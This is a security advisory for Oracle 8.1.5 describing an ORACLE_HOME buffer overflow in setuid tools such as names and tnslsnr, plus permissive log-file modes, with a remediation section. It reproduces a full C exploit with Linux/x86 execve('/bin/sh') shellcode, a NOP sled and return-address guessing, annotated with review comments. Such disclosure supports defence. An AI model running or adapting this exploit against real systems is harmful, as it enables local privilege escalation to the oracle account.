COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8.1.5

PROBLEM

    The following is based on a Hackerslab bug paper.  It describes two
    security vulnerabilities in Oracle 8.1.5.

    1. An overlong value in "ORACLE_HOME", one of Oracle's environment
       variables, overflows a fixed-size buffer in several of the Oracle
       command-line programs.  The applications vulnerable to this buffer
       overflow are as follows:

        - names
        - namesctl
        - onrsd
        - osslogin
        - tnslsnr
        - tnsping
        - trcasst
        - trcroute

       Where these programs are installed setuid (the SOLUTION below
       assumes they are), a local user who can set ORACLE_HOME and run one
       of them can use the overflow to execute arbitrary code -- in the
       exploit below, a shell -- with the privileges of the binary's
       owner, the oracle account.

    2. When a user executes one of the Oracle applications such as names,
       oracle or tnslsnr, the following log and trace files are created
       with the permissions shown -- group-writable by dba, and all but
       the trace file readable by every local user:

       names
       ======

        -rw-rw-r--   1 oracle   dba             0 Oct 20 01:45 ckpcch.ora
        -rw-rw-r--   1 oracle   dba           428 Oct 20 01:45 ckpreg.ora
        -rw-rw-r--   1 oracle   dba           950 Oct 20 01:45 names.log

       oracle
       ======

        -rw-rw----   1 oracle   dba           616 Oct 20 05:14 ora_[running pid].trc

       tnslsnr
       =======

        -rw-rw-r--   1 oracle   dba       2182176 Oct 20  2000 listener.log

    The exploit code published with the paper (Linux/x86 only; the path
    to the target binary is hard-coded in PATH):

    /*
    
	    Oracle 8.1.5 exploit
				    -by loveyou
    
	    offset value : -500 ~ +500
    
    */
    #include <stdio.h>
    #include <stdlib.h>
    
    #define BUFFER          	800     /* total length of the ORACLE_HOME payload, including the trailing NUL */
    #define NOP             	0x90    /* x86 one-byte NOP, used to pad the landing area in front of the shellcode */
    #define PATH               "/hackerslab/loveyou/oracle/8.1.5/bin/names" /* hard-coded target binary; must be adjusted to the local ORACLE_HOME/bin */
    
    /*
     * Payload: the well-known K2 Linux/x86 execve("/bin/sh") stub.
     *
     * The jmp/call pair leaves the address of the trailing "/bin/sh" in
     * %esi.  The stub then NUL-terminates the string in place (byte 7),
     * stores a pointer to the string at offset 8 and a NULL at offset 12
     * (so argv = { "/bin/sh", NULL } and envp = NULL), and issues
     * syscall 0x0b (execve) followed by syscall 1 (exit).  The byte
     * sequence contains no 0x00, so it survives being copied as part of
     * a C string such as an environment variable value.
     */
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d"                                        /* jmp callz      	         	*/
    /* start: */
    "\x5e"                                                 /* popl %esi               		*/
    "\x29\xc0"                                         /* subl %eax, %eax         	*/
    "\x88\x46\x07"           	            /* movb %al, 0x07(%esi)    	*/
    "\x89\x46\x0c"                                /* movl %eax, 0x0c(%esi)   	*/
    "\x89\x76\x08"                                /* movl %esi, 0x08(%esi)   	*/
    "\xb0\x0b"                                        /* movb $0x0b, %al         	*/
    "\x87\xf3"                                          /* xchgl %esi, %ebx        	*/
    "\x8d\x4b\x08"                                /* leal 0x08(%ebx), %ecx   	*/
    "\x8d\x53\x0c"                                /* leal 0x0c(%ebx), %edx   	*/
    "\xcd\x80"                                        /* int $0x80               		*/
    "\x29\xc0"                                        /* subl %eax, %eax         	*/
    "\x40"                                                 /* incl %eax               		*/
    "\xcd\x80"                                        /* int $0x80               		*/
    /* callz: */
    "\xe8\xde\xff\xff\xff"                    /* call start              		*/
    "/bin/sh";
    
    
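    /*
     * Return the current stack pointer.  main() uses it as the base for
     * guessing where the overflowing ORACLE_HOME copy will land on the
     * target's stack.
     *
     * The original relied on the value the asm statement left in %eax and
     * then fell off the end of a non-void function, which is undefined
     * behaviour and breaks as soon as the optimiser touches the function.
     * Read %esp through an explicit output operand and return it instead.
     * Like the shellcode, this is specific to x86 (32-bit %esp).
     */
    unsigned long getesp(void)
    {
            unsigned int sp;

            __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
            return (unsigned long)sp;
    }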
    
    /*
     * Build an oversized ORACLE_HOME value and run the target with it set.
     *
     * Intended layout of the BUFFER-byte payload:
     *   [NOP sled (first half)] [shellcode, centred on the midpoint]
     *   [guessed return address, repeated (second half)]
     * so that a guessed address landing anywhere in the sled slides into
     * the shellcode.  See the NOTE on memset() below for what is actually
     * built.
     *
     * argv[1], if present, is an offset (the header suggests -500..+500)
     * subtracted from the guessed address; 5933 is the author's tuned
     * distance between this process's stack and the target's.
     *
     * Only meaningful when PATH is a setuid binary: the shell spawned by
     * the shellcode then runs as the file's owner.  strlen()/memset() are
     * used without including <string.h>, so they are implicitly declared
     * (a compile error in C99 and later).
     */
    int main(int argc, char *argv[])
    {
            char *buff, *ptr,binary[120];     /* binary[] is never used */
            long *addr_ptr, addr;
            int bsize=BUFFER;
            int i,offset;
    
            offset = 0 ;
    
            if ( argc > 1 ) offset = atoi(argv[1]);   /* no range/format check on the user-supplied offset */
    
            buff = malloc(bsize);                     /* NOTE(review): return value not checked */
            addr = getesp() - 5933 - offset;          /* guessed address of the NOP sled on the target's stack */
            ptr = buff;
            addr_ptr = (long *) ptr;
    
            /* fill the whole buffer with the guessed return address (4-byte steps) */
            for (i = 0; i < bsize; i+=4)
                    *(addr_ptr++) = addr;
    
            /*
             * NOTE(review): memset() takes (dst, value, count) -- the last
             * two arguments are swapped here.  As written this sets NOP
             * (0x90 == 144) bytes to the value bsize/2 (400), which is
             * truncated to the byte 0x90, so only the first 144 bytes
             * become NOPs; bytes 144..378 keep the repeated return address
             * instead of forming part of the sled.  The intended call is
             * memset(buff, NOP, bsize/2).  The tuned offset above was
             * presumably found with the code as published, so fixing this
             * may require re-tuning.
             */
            memset(buff,bsize/2,NOP);
    
            /* place the shellcode so that it is centred on the buffer midpoint */
            ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
            for (i = 0; i < strlen(shellcode); i++)
                    *(ptr++) = shellcode[i];
    
            buff[bsize - 1] = '\0';                   /* setenv() copies up to the first NUL */
    
            setenv("ORACLE_HOME",buff,1);             /* the target reads this; presumably copied into a fixed buffer -- see advisory text */
    
            printf("[ offset:%d buffer=%d ret:0x%x ]\n",
                    offset,strlen(buff),addr);
            /* NOTE(review): system() goes through /bin/sh, which passes the
             * modified environment on to the hard-coded target binary. */
            system(PATH);
    
            /* no return statement: the exit status is indeterminate before C99 */
    }

SOLUTION

    Contact your vendor for a patch, or remove the setuid bit from the
    affected binaries as shown below.  Stripping setuid stops the overflow
    from yielding the file owner's privileges, but it may prevent users
    other than oracle from running these tools, and it does nothing about
    the group-writable, world-readable log files listed above -- restrict
    those separately (for example via the oracle account's umask or an
    explicit chmod on the log directory).

        # su - oracle
        $ cd /oracle_8.1.5_install_directory/bin
        $ chmod a-s names  namesctl  onrsd  osslogin  tnslsnr  tnsping  trcasst  trcroute